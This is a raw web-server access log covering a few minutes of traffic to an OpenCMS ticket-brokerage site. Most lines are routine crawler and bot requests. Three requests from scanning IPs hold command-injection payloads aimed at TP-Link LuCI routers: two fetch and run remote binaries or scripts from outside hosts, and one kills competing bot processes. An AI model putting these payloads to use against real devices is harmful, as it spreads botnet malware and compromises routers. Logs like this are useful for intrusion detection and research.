47.128.61.33 - - [28/Jun/2024:00:56:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.61.33 - - [28/Jun/2024:00:56:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.61.33 - - [28/Jun/2024:00:56:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
66.249.76.170 - - [28/Jun/2024:00:56:30 +0200] "GET /ticket2/opencms/en/buy/?comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 76580
3.224.220.101 - - [28/Jun/2024:00:56:31 +0200] "GET /ticket2/opencms/fi/buy/?edid=8085E80D-BC8F-CDCF-7CC8-2F497FE082D3&page=1 HTTP/1.1" 200 113405
94.23.7.188 - - [28/Jun/2024:00:56:31 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=50C0023B-61A7-4684-18AF-AEB17F1F3E03&sortorder=asc&column=row HTTP/1.1" 200 87551
54.38.85.36 - - [28/Jun/2024:00:56:33 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
3.224.220.101 - - [28/Jun/2024:00:56:34 +0200] "GET /ticket2/opencms/fi/buy/?edid=E1CACBEB-5FB5-F359-D95F-1110648BB53A&page=1 HTTP/1.1" 200 113405
5.9.55.228 - - [28/Jun/2024:00:56:37 +0200] "GET /ticket2/opencms/en/venue/?countryid=BA1BF93B-47B3-318B-02DF-4D6F84D30854 HTTP/1.1" 200 100730
3.224.220.101 - - [28/Jun/2024:00:56:38 +0200] "GET /ticket2/opencms/fi/buy/?edid=E9DB3A42-82BF-9B65-3ED4-EE5A32871388&page=1 HTTP/1.1" 200 108778
54.38.85.36 - - [28/Jun/2024:00:56:40 +0200] "GET /ticket2/opencms/en/login/?edid=37482F50-B95C-A510-B78C-2DC507E76C77 HTTP/1.1" 200 73431
23.22.35.162 - - [28/Jun/2024:00:56:42 +0200] "GET /ticket2/opencms/fi/buy/?edid=B7C31852-4938-05B8-A23C-0248E7A3D5BA&page=1 HTTP/1.1" 200 108772
94.23.7.188 - - [28/Jun/2024:00:56:46 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=50C0023B-61A7-4684-18AF-AEB17F1F3E03&sortorder=asc&column=section HTTP/1.1" 200 87551
52.70.240.171 - - [28/Jun/2024:00:56:47 +0200] "GET /ticket2/opencms/fi/buy/?edid=7C16C78F-F9EE-B2A9-0C9E-990B916B48DD&page=1 HTTP/1.1" 200 113404
54.38.85.36 - - [28/Jun/2024:00:56:48 +0200] "GET /ticket2/opencms/en/login/?edid=3BC0166D-3334-F436-7AC9-C815C4D456EB HTTP/1.1" 200 73431
52.70.240.171 - - [28/Jun/2024:00:56:50 +0200] "GET /ticket2/opencms/fi/buy/?edid=71FF0DDB-994C-2EA5-7C18-3DECE9AE5101&page=1 HTTP/1.1" 200 115283
47.128.116.167 - - [28/Jun/2024:00:56:51 +0200] "GET /ticket2/opencms/nl/buy/?comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76 HTTP/1.1" 200 74844
47.128.116.167 - - [28/Jun/2024:00:56:52 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.116.167 - - [28/Jun/2024:00:56:53 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.116.167 - - [28/Jun/2024:00:56:53 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.116.167 - - [28/Jun/2024:00:56:53 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.116.167 - - [28/Jun/2024:00:56:53 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.116.167 - - [28/Jun/2024:00:56:53 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.116.167 - - [28/Jun/2024:00:56:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
23.22.35.162 - - [28/Jun/2024:00:56:54 +0200] "GET /ticket2/opencms/fi/buy/?edid=CCC52869-7D07-37D3-E716-0EF1AC21BCE4&page=1 HTTP/1.1" 200 112272
5.9.55.228 - - [28/Jun/2024:00:56:55 +0200] "GET /ticket2/opencms/en/venue/?countryid=B8EC120B-4F43-C769-CF6D-BEF2F141BF54 HTTP/1.1" 200 100730
54.38.85.36 - - [28/Jun/2024:00:56:57 +0200] "GET /ticket2/opencms/en/login/?edid=3F0125BA-1C61-4BFF-2467-AF8AB47237AF HTTP/1.1" 200 73431
94.23.7.188 - - [28/Jun/2024:00:56:58 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=51CE4D50-7536-6D99-0472-A1F5831352C9&sortorder=asc&column=price HTTP/1.1" 200 87532
185.191.127.212 - - [28/Jun/2024:00:56:58 +0200] "GET /ticket2/opencms/de/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%253E%2560wget+http%253A%252F%252F103.149.28.141%252Ft+-O-+%7c+sh%2560) HTTP/1.1" 404 -
3.224.220.101 - - [28/Jun/2024:00:56:59 +0200] "GET /ticket2/opencms/fi/buy/?edid=F75A8704-39CC-1233-9E9B-2121B4DFC51E&page=1 HTTP/1.1" 200 115286
52.70.240.171 - - [28/Jun/2024:00:57:02 +0200] "GET /ticket2/opencms/fi/buy/?edid=1BDA6D08-38AF-6470-7423-555F9C3DEC73&page=1 HTTP/1.1" 200 119944
54.38.85.36 - - [28/Jun/2024:00:57:05 +0200] "GET /ticket2/opencms/en/login/?edid=AF97ABE2-861D-FC72-98BD-465ED5205D7B HTTP/1.1" 200 73431
52.70.240.171 - - [28/Jun/2024:00:57:10 +0200] "GET /ticket2/opencms/fi/buy/?edid=ADD1F57C-36B4-39D2-9578-BA2614FAFC35&page=1 HTTP/1.1" 200 115290
54.38.85.36 - - [28/Jun/2024:00:57:11 +0200] "GET /ticket2/opencms/en/login/?edid=B512ECB6-FE48-98E4-B068-DEF9FFF07C11 HTTP/1.1" 200 73431
23.22.35.162 - - [28/Jun/2024:00:57:11 +0200] "GET /ticket2/opencms/fi/buy/?edid=42C5D83C-45F5-510D-23C9-7B4CE8796C8F&page=1 HTTP/1.1" 200 115287
94.23.7.188 - - [28/Jun/2024:00:57:12 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=51CE4D50-7536-6D99-0472-A1F5831352C9&sortorder=asc&column=row HTTP/1.1" 200 87532
5.9.55.228 - - [28/Jun/2024:00:57:12 +0200] "GET /ticket2/opencms/en/venue/?countryid=B756B65C-E014-24B5-95EC-187A417913E3 HTTP/1.1" 200 100730
52.70.240.171 - - [28/Jun/2024:00:57:15 +0200] "GET /ticket2/opencms/fi/buy/?edid=BE6ABBE8-6DAC-6741-AA1A-CEB7A9B0DCF0&page=1 HTTP/1.1" 200 115283
3.224.220.101 - - [28/Jun/2024:00:57:18 +0200] "GET /ticket2/opencms/fi/buy/?edid=6B1BC3D5-41D5-1130-8508-F118D3CA5AB9&page=1 HTTP/1.1" 200 115289
54.38.85.36 - - [28/Jun/2024:00:57:20 +0200] "GET /ticket2/opencms/en/login/?edid=E2F152C4-7969-462B-B131-68D2CAA6A830 HTTP/1.1" 200 73431
94.23.7.188 - - [28/Jun/2024:00:57:22 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=51CE4D50-7536-6D99-0472-A1F5831352C9&sortorder=asc&column=section HTTP/1.1" 200 87532
3.224.220.101 - - [28/Jun/2024:00:57:23 +0200] "GET /ticket2/opencms/fi/buy/?edid=66C22035-E7EA-E10A-4BFC-2C30733037DC&page=1 HTTP/1.1" 200 113338
52.70.240.171 - - [28/Jun/2024:00:57:27 +0200] "GET /ticket2/opencms/fi/buy/?edid=DD14CC82-883B-BD06-4306-EBD494AA1804&page=1 HTTP/1.1" 200 113330
47.128.55.241 - - [28/Jun/2024:00:57:27 +0200] "GET /ticket2/opencms/fi/buy/?edid=BA98F497-79D9-0BA1-3E19-B45BB0763E07 HTTP/1.1" 200 73261
47.128.55.241 - - [28/Jun/2024:00:57:28 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.55.241 - - [28/Jun/2024:00:57:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.55.241 - - [28/Jun/2024:00:57:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.55.241 - - [28/Jun/2024:00:57:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.55.241 - - [28/Jun/2024:00:57:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.55.241 - - [28/Jun/2024:00:57:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.55.241 - - [28/Jun/2024:00:57:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
5.9.55.228 - - [28/Jun/2024:00:57:30 +0200] "GET /ticket2/opencms/en/venue/?countryid=B5C0CC6D-2D05-4091-BA03-82DFEB13498E HTTP/1.1" 200 100730
3.224.220.101 - - [28/Jun/2024:00:57:30 +0200] "GET /ticket2/opencms/fi/buy/?edid=7F2B1FEA-20FE-7448-32AC-111154CA401B&page=1 HTTP/1.1" 200 113326
3.224.220.101 - - [28/Jun/2024:00:57:34 +0200] "GET /ticket2/opencms/fi/buy/?edid=10597F35-2AC7-31D2-FB61-15A36BB6D73B&page=1 HTTP/1.1" 200 113326
94.23.7.188 - - [28/Jun/2024:00:57:38 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=52E9C51D-192F-C954-8F05-403EF150A75E HTTP/1.1" 200 89113
52.70.240.171 - - [28/Jun/2024:00:57:39 +0200] "GET /ticket2/opencms/fi/buy/?edid=68B485F7-9483-6E4F-656D-602EE2AC621D&page=1 HTTP/1.1" 200 113329
52.70.240.171 - - [28/Jun/2024:00:57:42 +0200] "GET /ticket2/opencms/fi/buy/?edid=B089B4B8-933D-AB70-BE65-2A133877E5AC&page=1 HTTP/1.1" 200 113328
23.22.35.162 - - [28/Jun/2024:00:57:47 +0200] "GET /ticket2/opencms/fi/buy/?edid=8F340A1C-D664-7FDD-8257-FE31525DAB7C&page=1 HTTP/1.1" 200 113330
5.9.55.228 - - [28/Jun/2024:00:57:48 +0200] "GET /ticket2/opencms/en/venue/?countryid=B54C3B27-273E-C131-E997-905F5C2CDDC3 HTTP/1.1" 200 100730
66.249.75.98 - - [28/Jun/2024:00:57:49 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=56062CAE-66F5-81C7-DD42-F372CD5AE180 HTTP/1.1" 200 111374
141.98.83.197 - - [28/Jun/2024:00:57:49 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 -
94.23.7.188 - - [28/Jun/2024:00:57:49 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=53295BAC-18AC-7C4A-B0D4-A319E386EA83 HTTP/1.1" 200 89102
141.98.83.197 - - [28/Jun/2024:00:57:49 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 -
52.70.240.171 - - [28/Jun/2024:00:57:50 +0200] "GET /ticket2/opencms/fi/buy/?edid=F8A721FB-6959-3E3B-0E9C-2BF5336E70F2&page=1 HTTP/1.1" 200 113327
3.224.220.101 - - [28/Jun/2024:00:57:54 +0200] "GET /ticket2/opencms/fi/buy/?edid=8E8E9404-172C-6C57-7F68-EAFC3F95D1AC&page=1 HTTP/1.1" 200 113332
52.70.240.171 - - [28/Jun/2024:00:57:59 +0200] "GET /ticket2/opencms/fi/buy/?edid=063774E2-DE1A-6A46-E97B-D379290B879E&page=1 HTTP/1.1" 200 113330
3.224.220.101 - - [28/Jun/2024:00:58:03 +0200] "GET /ticket2/opencms/fi/buy/?edid=56062CAE-66F5-81C7-DD42-F372CD5AE180&page=1 HTTP/1.1" 200 113325
94.23.7.188 - - [28/Jun/2024:00:58:06 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=536A1E51-556D-8EFA-3895-7913FC522E05&sortorder=asc&column=row HTTP/1.1" 200 89117
52.70.240.171 - - [28/Jun/2024:00:58:06 +0200] "GET /ticket2/opencms/fi/buy/?edid=4660DE29-C3F1-FFBE-5E6B-4C74E874EC91&page=1 HTTP/1.1" 200 113328
5.9.55.228 - - [28/Jun/2024:00:58:07 +0200] "GET /ticket2/opencms/en/venue/?countryid=B5468851-B3C9-87D8-4143-DEE5BC2265CB HTTP/1.1" 200 102297
47.128.114.91 - - [28/Jun/2024:00:58:07 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/uefa-champions-league/cfr_cluj/ HTTP/1.1" 200 72130
47.128.114.91 - - [28/Jun/2024:00:58:08 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.114.91 - - [28/Jun/2024:00:58:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/banners/sv/football_sv.png HTTP/1.1" 200 13104
47.128.114.91 - - [28/Jun/2024:00:58:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.114.91 - - [28/Jun/2024:00:58:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.114.91 - - [28/Jun/2024:00:58:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.114.91 - - [28/Jun/2024:00:58:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.114.91 - - [28/Jun/2024:00:58:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.114.91 - - [28/Jun/2024:00:58:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
52.70.240.171 - - [28/Jun/2024:00:58:11 +0200] "GET /ticket2/opencms/fi/buy/?edid=C8E47E46-ADCD-586A-7BE4-CF1C96256B2D&page=1 HTTP/1.1" 200 113330
52.70.240.171 - - [28/Jun/2024:00:58:15 +0200] "GET /ticket2/opencms/fi/buy/?edid=159AEE85-969E-7453-4999-69FCFD2915E6&page=1 HTTP/1.1" 200 117977
94.23.7.188 - - [28/Jun/2024:00:58:18 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=55AE14A0-00CF-8E29-D1CC-F8CDD1E23137&sortorder=asc&column=price HTTP/1.1" 200 87557
52.70.240.171 - - [28/Jun/2024:00:58:19 +0200] "GET /ticket2/opencms/fi/buy/?edid=DA2AFD28-6AA1-4222-20E5-CCCE4BF9B981&page=1 HTTP/1.1" 200 113328
52.70.240.171 - - [28/Jun/2024:00:58:22 +0200] "GET /ticket2/opencms/fi/buy/?edid=F0845893-AB25-79ED-E273-8681A31846EB&page=1 HTTP/1.1" 200 115130
5.9.55.228 - - [28/Jun/2024:00:58:25 +0200] "GET /ticket2/opencms/en/venue/?countryid=B33351B8-DB63-1834-566A-CB44E5291395 HTTP/1.1" 200 100730
23.22.35.162 - - [28/Jun/2024:00:58:27 +0200] "GET /ticket2/opencms/fi/buy/?edid=38A9CF02-8181-1667-78E4-4388829901BC&page=1 HTTP/1.1" 200 113327
94.23.7.188 - - [28/Jun/2024:00:58:30 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=5630DE9E-B2AA-33B3-91FB-95B3177F4375&sortorder=asc&column=row HTTP/1.1" 200 88829
52.70.240.171 - - [28/Jun/2024:00:58:30 +0200] "GET /ticket2/opencms/fi/buy/?edid=72E82760-BEC3-3CF9-6E90-2FDD50852364&page=1 HTTP/1.1" 200 113333
23.22.35.162 - - [28/Jun/2024:00:58:34 +0200] "GET /ticket2/opencms/fi/buy/?edid=6749402D-C332-2C4D-9191-3C983EDD528C&page=1 HTTP/1.1" 200 113334
52.70.240.171 - - [28/Jun/2024:00:58:39 +0200] "GET /ticket2/opencms/nl/buy/?edid=7568E602-7C67-35D2-952F-D243F8930169&page=1 HTTP/1.1" 200 110486
5.9.55.228 - - [28/Jun/2024:00:58:42 +0200] "GET /ticket2/opencms/en/venue/?countryid=B2685E9F-F5FB-C584-F982-0FC8E094C1AC HTTP/1.1" 200 100730
23.22.35.162 - - [28/Jun/2024:00:58:43 +0200] "GET /ticket2/opencms/nl/buy/?edid=7F8DD7AE-C02D-DBD7-A437-1943525E7DF2&page=1 HTTP/1.1" 200 110483
216.245.221.83 - - [28/Jun/2024:00:58:45 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
216.245.221.83 - - [28/Jun/2024:00:58:45 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
52.70.240.171 - - [28/Jun/2024:00:58:47 +0200] "GET /ticket2/opencms/nl/buy/?edid=E53C8E7A-C1C8-80DF-ED27-96FEFF6B5147&page=1 HTTP/1.1" 200 110484
94.23.7.188 - - [28/Jun/2024:00:58:47 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=563FCA46-03ED-44D1-2A64-D153F80207C9&sortorder=asc&column=price HTTP/1.1" 200 89105
23.22.35.162 - - [28/Jun/2024:00:58:50 +0200] "GET /ticket2/opencms/nl/buy/?edid=8A787324-CD72-C476-64CB-87071CD71C2F&page=1 HTTP/1.1" 200 110481
23.22.35.162 - - [28/Jun/2024:00:58:55 +0200] "GET /ticket2/opencms/nl/buy/?edid=9CB65BAE-DCD8-2D95-397D-813CF31BA500&page=1 HTTP/1.1" 200 110480
94.23.7.188 - - [28/Jun/2024:00:58:57 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=563FCA46-03ED-44D1-2A64-D153F80207C9&sortorder=asc&column=row HTTP/1.1" 200 89105
52.70.240.171 - - [28/Jun/2024:00:58:59 +0200] "GET /ticket2/opencms/nl/buy/?edid=81CABF18-BA6D-C79B-B74D-94D66EB07C86&page=1 HTTP/1.1" 200 110484
47.128.60.11 - - [28/Jun/2024:00:58:59 +0200] "GET /ticket2/opencms/fr/buy/?catid=08F27F2A-1872-A39F-A97C-63093E77B18A&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 82845
47.128.60.11 - - [28/Jun/2024:00:59:00 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.60.11 - - [28/Jun/2024:00:59:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
5.9.55.228 - - [28/Jun/2024:00:59:01 +0200] "GET /ticket2/opencms/en/venue/?countryid=B1E58C49-66C4-8DF4-D222-33EDBDF73F09 HTTP/1.1" 200 100730
47.128.60.11 - - [28/Jun/2024:00:59:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.60.11 - - [28/Jun/2024:00:59:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.60.11 - - [28/Jun/2024:00:59:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.60.11 - - [28/Jun/2024:00:59:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.60.11 - - [28/Jun/2024:00:59:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
23.22.35.162 - - [28/Jun/2024:00:59:02 +0200] "GET /ticket2/opencms/nl/buy/?edid=73ADC408-1051-3D3B-0D53-5DA8E608120E&page=1 HTTP/1.1" 200 110480
20.51.175.14 - - [28/Jun/2024:00:59:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
52.70.240.171 - - [28/Jun/2024:00:59:07 +0200] "GET /ticket2/opencms/nl/buy/?edid=5605B728-A815-14DD-9E19-09BABDE81131&page=1 HTTP/1.1" 200 110482
66.249.75.167 - - [28/Jun/2024:00:59:07 +0200] "GET /ticket2/opencms/dk/sport/fodboldbilletter/premier-league/arsenal/?partner=5DA1B85A-5A44-4C00-C2EF-3DFF7E687A1D HTTP/1.1" 302 -
66.249.75.169 - - [28/Jun/2024:00:59:08 +0200] "GET /ticket2/opencms/set_aff_cookie.jsp?partner=5DA1B85A-5A44-4C00-C2EF-3DFF7E687A1D&url=%2Fdk%2Fsport%2Ffodboldbilletter%2Fpremier-league%2Farsenal%2Findex.html%3Fr%3Dtrue HTTP/1.1" 200 172
3.224.220.101 - - [28/Jun/2024:00:59:11 +0200] "GET /ticket2/opencms/nl/buy/?edid=D771BB60-0217-E0E2-A4A8-756428AAA5D6&page=1 HTTP/1.1" 200 87209
17.241.219.63 - - [28/Jun/2024:00:59:12 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=19E38F9D-861E-8A2A-C1DB-C0C055563625 HTTP/1.1" 200 87202
94.23.7.188 - - [28/Jun/2024:00:59:13 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=568CEAF8-749E-5C3B-AA01-C61B6A68B792&sortorder=asc&column=price HTTP/1.1" 200 87558
3.224.220.101 - - [28/Jun/2024:00:59:15 +0200] "GET /ticket2/opencms/nl/buy/?edid=C8C69015-BCBB-8460-663E-8B2E58614425&page=1 HTTP/1.1" 200 110484
66.249.76.160 - - [28/Jun/2024:00:59:15 +0200] "GET /ticket2/opencms/dk/sport/fodboldbilletter/premier-league/arsenal/?r=true HTTP/1.1" 200 84110
5.9.55.228 - - [28/Jun/2024:00:59:18 +0200] "GET /ticket2/opencms/en/venue/?countryid=B05AF8CC-D1BF-73AB-E946-B6702610D2C6 HTTP/1.1" 200 100730
3.224.220.101 - - [28/Jun/2024:00:59:19 +0200] "GET /ticket2/opencms/nl/buy/?edid=F03BC80C-51C9-D5C8-6DEC-FA800785943C&page=1 HTTP/1.1" 200 110460
40.77.167.43 - - [28/Jun/2024:00:59:20 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=D2281AF2-0CAB-347E-485A-AF9E4C00F32A HTTP/1.1" 200 87575
40.77.167.43 - - [28/Jun/2024:00:59:21 +0200] "GET /ticket2/opencms/sv/magazine/article?title=neymar-en-av-varldens-dyraste-varvningar HTTP/1.1" 200 75274
23.22.35.162 - - [28/Jun/2024:00:59:22 +0200] "GET /ticket2/opencms/nl/buy/?edid=0F75B18C-E221-E332-009D-FADB7D439839&page=1 HTTP/1.1" 200 110468
94.23.7.188 - - [28/Jun/2024:00:59:24 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=568CEAF8-749E-5C3B-AA01-C61B6A68B792&sortorder=asc&column=row HTTP/1.1" 200 87558
66.249.75.163 - - [28/Jun/2024:00:59:26 +0200] "GET /ticket2/opencms/sv/venue/?venueid=0244E869-E2F3-A6E3-662F-EE6F7C68AB65 HTTP/1.1" 200 72169
3.224.220.101 - - [28/Jun/2024:00:59:26 +0200] "GET /ticket2/opencms/nl/buy/?edid=96E011DF-5241-3266-195A-F1BA5B4FE37C&page=1 HTTP/1.1" 200 87211
94.23.7.188 - - [28/Jun/2024:00:59:29 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=57459A80-66BC-2154-84E8-27032EAB09A5&sortorder=asc&column=price HTTP/1.1" 200 89306
3.224.220.101 - - [28/Jun/2024:00:59:31 +0200] "GET /ticket2/opencms/nl/buy/?edid=361EAD73-436C-F7FD-91EE-7D353735C8BC&page=1 HTTP/1.1" 200 110479
3.224.220.101 - - [28/Jun/2024:00:59:34 +0200] "GET /ticket2/opencms/nl/buy/?edid=9298EE47-1A7F-20BC-182D-AD5062126FDE&page=1 HTTP/1.1" 200 87211
5.9.55.228 - - [28/Jun/2024:00:59:35 +0200] "GET /ticket2/opencms/en/venue/?countryid=AE789D77-DA16-B130-0CBE-FA563F4A0E8A HTTP/1.1" 200 100730
23.22.35.162 - - [28/Jun/2024:00:59:39 +0200] "GET /ticket2/opencms/nl/buy/?edid=78077671-6D1C-6384-F4E3-25AAC0A5B810&page=1 HTTP/1.1" 200 110478
23.22.35.162 - - [28/Jun/2024:00:59:42 +0200] "GET /ticket2/opencms/nl/buy/?edid=236F7016-4763-1BAF-F2F0-3C25D5C100A7&page=1 HTTP/1.1" 200 110486
5.9.55.228 - - [28/Jun/2024:00:59:43 +0200] "GET /ticket2/opencms/en/venue/?countryid=ADE48E06-C02A-081C-C0CF-A96D2EE2FC7A HTTP/1.1" 200 100730
47.128.55.118 - - [28/Jun/2024:00:59:46 +0200] "GET /ticket2/opencms/fi/buy/?edid=DCF22239-47F2-2282-C13B-85FCE1D7C913 HTTP/1.1" 200 73261
94.23.7.188 - - [28/Jun/2024:00:59:46 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=57459A80-66BC-2154-84E8-27032EAB09A5&sortorder=asc&column=section HTTP/1.1" 200 89306
23.22.35.162 - - [28/Jun/2024:00:59:47 +0200] "GET /ticket2/opencms/nl/buy/?edid=ACB1E7D7-0E7C-427B-E737-7A4E15C5EE0F&page=1 HTTP/1.1" 200 110487
47.128.55.118 - - [28/Jun/2024:00:59:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.55.118 - - [28/Jun/2024:00:59:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.55.118 - - [28/Jun/2024:00:59:48 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.55.118 - - [28/Jun/2024:00:59:48 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.55.118 - - [28/Jun/2024:00:59:48 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.55.118 - - [28/Jun/2024:00:59:48 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.55.118 - - [28/Jun/2024:00:59:48 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.48.174 - - [28/Jun/2024:00:59:49 +0200] "GET /ticket2/opencms/fi/about/contact HTTP/1.1" 200 72438
